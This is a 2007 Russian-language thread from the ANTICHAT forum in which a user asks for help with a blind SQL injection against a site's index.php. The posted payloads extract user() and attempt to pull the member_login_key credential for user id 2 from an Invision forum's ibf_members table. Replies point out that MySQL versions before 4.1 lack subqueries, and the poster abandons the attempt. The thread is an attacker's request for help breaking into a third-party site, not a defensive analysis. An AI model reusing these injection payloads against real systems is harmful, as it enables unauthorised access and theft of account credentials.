HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Blind SQL-Inj. Нужна помощь...
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Blind SQL-Inj. Нужна помощь...
  #1  
Старый 14.10.2007, 20:55
L0rd_Ha0S
Участник форума
Регистрация: 25.01.2006
Сообщений: 158
С нами: 10679366

Репутация: 361
По умолчанию Blind SQL-Inj. Нужна помощь...
Есть скрипт, подверженный Blind SQL-инъекции:
Код:
index.php?show=item&id=29+order+by+id'+and+ascii(lower(substring(user(),1,1)))>1/*
запрос успешно выполняется, все символы спокойно перебираются.

Если вместо user() поставить (select+member_login_key+from+ibf_members+where+id =2), чтоб было вот так:
Код:
index.php?show=item&id=29+order+by+id'+and+ascii(lower(substring((select+member_login_key+from+ibf_members+where+id=2),1,1)))>1/*
то выдается ошибка:
Цитата:
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'select member_login_key from ibf_members where id=2),1,1)))>1/*
Указанные поле и таблица точно существуют. Пробовал также варианты с aes_decrypt/aes_encrypt, char(), concat() - безрезультатно.

Кто-нить знает, почему выдается эта ошибка, и как это обойти? Запрос ведь верный вроде...
𝕏 Twitter Reddit Telegram Копировать ссылку
 

  #2  
Старый 14.10.2007, 21:14
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию
версия mysql ниже 4.1 не поддерживает подзапросов
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 

  #3  
Старый 14.10.2007, 21:24
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами: 10459106

Репутация: 2996


По умолчанию
Согласен с бр сначало надо пробить version()
 

  #4  
Старый 14.10.2007, 22:02
L0rd_Ha0S
Участник форума
Регистрация: 25.01.2006
Сообщений: 158
С нами: 10679366

Репутация: 361
По умолчанию
Цитата:
Сообщение от blackybr  
версия mysql ниже 4.1 не поддерживает подзапросов
Спасибо, не знал.

Версия 4.0.27-log
По всей видимости придётся забить на эту дырку.
Всем спасибо.
 

  #5  
Старый 15.10.2007, 21:52
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
С нами: 11517446

Репутация: 2258


По умолчанию
Закрыто значит.
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Закрытая тема



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.